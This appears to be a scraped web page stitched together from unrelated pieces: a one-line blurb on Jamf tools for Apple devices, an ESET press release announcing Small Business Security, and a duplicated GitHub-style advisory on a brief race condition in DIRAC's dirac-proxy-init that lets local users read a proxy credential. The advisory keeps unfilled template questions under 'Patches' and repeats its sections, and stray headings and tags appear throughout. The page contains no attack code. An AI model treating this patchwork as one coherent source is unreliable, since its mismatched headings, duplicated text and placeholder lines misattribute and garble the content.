Apple devices have long established their presence in business. Enterprise-level tools like Jamf's help ensure that those devices stay compliant with expectations for corporate standards in security.

**About the Author(s)**

New Jamf Tools Give Enterprise IT Security and Compliance Controls

PRESS RELEASE

SAN DIEGO, April 9, 2024/PRNewswire/ -- ESET, a global leader in digital security, is pleased to announce the introduction of ESET Small Business Security, which has been specifically designed to meet the cybersecurity needs of Small Office/Home Office business owners.

According to the Small Business Administration, out of the 33.3 million small businesses in the United States, over 27 million are managed solely by their owners and do not employ any additional personnel. Over 5 million small businesses have under 19 employees1. ESET's new comprehensive security solution is engineered to provide seamless, user-friendly protection, enabling these smaller SMBs to thrive in an increasingly digital landscape.

"This new offering is a testament to ESET's commitment to innovation and its dedication to supporting the growth and security of entrepreneurs, small businesses and home offices," said Brent McCarty, President of ESET North America. "Small businesses have long demanded the power of ESET in a right-sized offering. With this launch, we provide SOHO business owners with a simple yet powerful solution for their businesses that is easily manageable, highly reliable, and tailored to their needs, enabling them to focus on their growth without compromising on security."

The ESET Small Business Security solution supports up to 25 devices and offers an array of features tailored to safeguard online banking transactions and browsing, secure devices, manage passwords, protect Windows servers, encrypt sensitive data, guard against ransomware and counter phishing scams. Furthermore, the offering facilitates safe and anonymous browsing alongside unlimited VPN security where applicable, ensuring both work and personal devices are shielded from cyber threats. This new offering guarantees reliable security with a minimal system footprint, ensuring efficient protection across multiple operating systems, including Windows, Android, and macOS.

ESET Small Business Security includes ESET HOME, security management platform that enables users to have complete security management with information about security status, devices, subscriptions and features currently in use.

ESET HOME is available via a web portal and a mobile application, allowing users to have security of their devices under control anywhere they go.

For more detailed information about ESET Small Business Security, visit here.

About ESET  
For more than 30 years, ESET® has been developing industry-leading IT security software and services to protect businesses, critical infrastructure, and consumers worldwide from increasingly sophisticated digital threats. From endpoint and mobile security to endpoint detection and response, as well as encryption and multifactor authentication, ESET's high-performing, easy-to-use solutions unobtrusively protect and monitor 24/7, updating defenses in real time to keep users safe and businesses running without interruption. Evolving threats require an evolving IT security company that enables the safe use of technology. This is backed by ESET's R&D centers worldwide, working in support of our shared future. For more information, visit www.eset.com or follow us on LinkedIn, Facebook, and Twitter (X).

ESET Launches a New Solution for Small Office/Home Office Businesses

### Impact

During the proxy generation process (e.g., when using `dirac-proxy-init`) it is possible for unauthorized users on the same machine to gain read access to the proxy. This allows the user to then perform any action that is possible with the original proxy.

This vulnerability only exists for a short period of time (sub-millsecond) during the generation process.

### Patches

_Has the problem been patched? What versions should users upgrade to?_

### Workarounds

Setting the `X509_USER_PROXY` environment variable to a path that is inside a directory that is only readable to the current user avoids the potential risk. After the file has been written it can be safely copied to the standard location (`/tmp/x509up_uNNNN`).

### References



**Impact**

During the proxy generation process (e.g., when using dirac-proxy-init) it is possible for unauthorized users on the same machine to gain read access to the proxy. This allows the user to then perform any action that is possible with the original proxy.

This vulnerability only exists for a short period of time (sub-millsecond) during the generation process.

**Patches**

_Has the problem been patched? What versions should users upgrade to?_

**Workarounds**

Setting the X509_USER_PROXY environment variable to a path that is inside a directory that is only readable to the current user avoids the potential risk. After the file has been written it can be safely copied to the standard location (/tmp/x509up_uNNNN).

**References****References**

*   GHSA-v6f3-gh5h-mqwx
*   DIRACGrid/DIRAC@1faa709

Tag

#mac